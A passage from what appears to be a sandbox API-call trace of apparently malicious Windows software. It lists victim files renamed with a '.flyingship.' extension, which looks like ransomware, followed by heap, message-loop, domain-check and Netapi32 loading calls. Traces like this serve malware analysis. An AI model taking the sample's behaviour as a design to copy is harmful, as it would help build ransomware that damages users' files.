HALPmcxz\\Music\\xhgr3.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.flyingship.mkv\r\n") returned 1 [0248.464] SendMessageW (hWnd=0x20168, Msg=0xb1, wParam=0xf4240, lParam=0xf423f) returned 0x1 [0248.466] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4158 | out: hHeap=0xbe0000) returned 1 [0248.466] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526d0 | out: hHeap=0xbe0000) returned 1 [0248.466] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4098 | out: hHeap=0xbe0000) returned 1 [0248.466] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe82c00 | out: hHeap=0xbe0000) returned 1 [0248.466] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52700 | out: hHeap=0xbe0000) returned 1 [0248.466] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4128 | out: hHeap=0xbe0000) returned 1 [0248.466] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4008 | out: hHeap=0xbe0000) returned 1 [0248.466] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d3f0 | out: hHeap=0xbe0000) returned 1 [0248.466] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0248.466] TranslateMessage (lpMsg=0x8bf904) returned 0 [0248.466] DispatchMessageW (lpMsg=0x8bf904) returned 0xffffffff [0248.466] GetForegroundWindow () returned 0x10058 [0248.466] GetWindowLongW (hWnd=0x10058, nIndex=-21) returned 0 [0248.466] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.467] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52700 [0248.467] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe526d0 [0248.467] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d3f0 [0248.467] CharUpperBuffW (in: lpsz="DOMAINCHECK", cchLength=0xb | out: lpsz="DOMAINCHECK") returned 0xb [0248.467] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d3f0 | out: hHeap=0xbe0000) returned 1 [0248.467] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526d0 | out: hHeap=0xbe0000) returned 1 [0248.467] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf4008 [0248.467] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01610 [0248.467] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0248.467] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526d0 [0248.467] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526d0 | out: hHeap=0xbe0000) returned 1 [0248.467] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d3f0 [0248.467] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4128 [0248.467] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe526d0 [0248.467] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4128 | out: hHeap=0xbe0000) returned 1 [0248.467] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe51280 [0248.467] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4128 [0248.467] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d440 [0248.467] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4098 [0248.467] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe526b0 [0248.467] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4098 | out: hHeap=0xbe0000) returned 1 [0248.467] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe512b8 [0248.467] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4098 [0248.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d468 [0248.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4158 [0248.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe526e0 [0248.468] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4158 | out: hHeap=0xbe0000) returned 1 [0248.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe512f0 [0248.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4158 [0248.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5f8 [0248.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4170 [0248.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52760 [0248.468] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4170 | out: hHeap=0xbe0000) returned 1 [0248.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe51328 [0248.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4170 [0248.468] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0248.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5a8 [0248.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4200 [0248.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52750 [0248.468] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4200 | out: hHeap=0xbe0000) returned 1 [0248.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d4b8 [0248.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4200 [0248.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4248 [0248.468] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0248.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52840 [0248.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52710 [0248.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01658 [0248.468] CharUpperBuffW (in: lpsz="_WINAPI_NETGETJOININFORMATION", cchLength=0x1d | out: lpsz="_WINAPI_NETGETJOININFORMATION") returned 0x1d [0248.469] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe01658 | out: hHeap=0xbe0000) returned 1 [0248.469] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52710 | out: hHeap=0xbe0000) returned 1 [0248.469] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf4218 [0248.469] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52710 [0248.469] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4140 [0248.469] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52710 | out: hHeap=0xbe0000) returned 1 [0248.469] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d490 [0248.469] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41d0 [0248.469] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52710 [0248.469] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41d0 | out: hHeap=0xbe0000) returned 1 [0248.469] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d580 [0248.469] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41d0 [0248.469] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41e8 [0248.469] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01658 [0248.469] PeekMessageW (in: lpMsg=0x8befb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befb4) returned 0 [0248.469] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d558 [0248.469] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41b8 [0248.469] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe526f0 [0248.469] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c88 [0248.469] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c70 [0248.470] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52770 [0248.470] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c70 | out: hHeap=0xbe0000) returned 1 [0248.470] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5d0 [0248.470] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c70 [0248.470] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52720 [0248.470] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6738 [0248.470] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.470] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c40 [0248.470] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52720 [0248.470] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c58 [0248.470] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.470] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6708 [0248.470] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52720 [0248.470] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c10 [0248.470] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.470] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c28 [0248.470] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52720 [0248.470] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66d8 [0248.470] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.470] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8be0 [0248.470] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52720 [0248.471] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bf8 [0248.471] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.471] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66a8 [0248.471] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52720 [0248.471] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bb0 [0248.471] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.471] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bc8 [0248.471] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52720 [0248.471] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6678 [0248.471] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.471] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b80 [0248.471] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52720 [0248.471] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b98 [0248.471] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.471] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe016a0 [0248.471] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d5d0 | out: hHeap=0xbe0000) returned 1 [0248.471] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6648 [0248.471] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52720 [0248.471] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.471] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52720 [0248.471] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b50 [0248.471] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0248.471] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b68 [0248.472] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe533b0 [0248.472] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe533a0 [0248.472] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6618 [0248.472] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b68 | out: hHeap=0xbe0000) returned 1 [0248.472] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533b0 | out: hHeap=0xbe0000) returned 1 [0248.472] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6618 | out: hHeap=0xbe0000) returned 1 [0248.472] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533a0 | out: hHeap=0xbe0000) returned 1 [0248.472] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5d0 [0248.472] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe533a0 [0248.472] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6618 [0248.472] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe533b0 [0248.472] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53390 [0248.472] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b68 [0248.472] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6618 | out: hHeap=0xbe0000) returned 1 [0248.472] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533b0 | out: hHeap=0xbe0000) returned 1 [0248.472] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b68 | out: hHeap=0xbe0000) returned 1 [0248.472] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53390 | out: hHeap=0xbe0000) returned 1 [0248.472] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53390 [0248.472] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b68 [0248.472] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe533b0 [0248.472] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53380 [0248.473] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6618 [0248.473] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b68 | out: hHeap=0xbe0000) returned 1 [0248.473] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533b0 | out: hHeap=0xbe0000) returned 1 [0248.473] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6618 | out: hHeap=0xbe0000) returned 1 [0248.473] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53380 | out: hHeap=0xbe0000) returned 1 [0248.473] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53380 [0248.473] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6618 [0248.473] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe533b0 [0248.473] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53370 [0248.473] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b68 [0248.473] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6618 | out: hHeap=0xbe0000) returned 1 [0248.473] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533b0 | out: hHeap=0xbe0000) returned 1 [0248.473] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b68 | out: hHeap=0xbe0000) returned 1 [0248.473] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53370 | out: hHeap=0xbe0000) returned 1 [0248.473] LoadLibraryW (lpLibFileName="Netapi32.dll") returned 0x744a0000 [0248.485] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a48 [0248.485] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 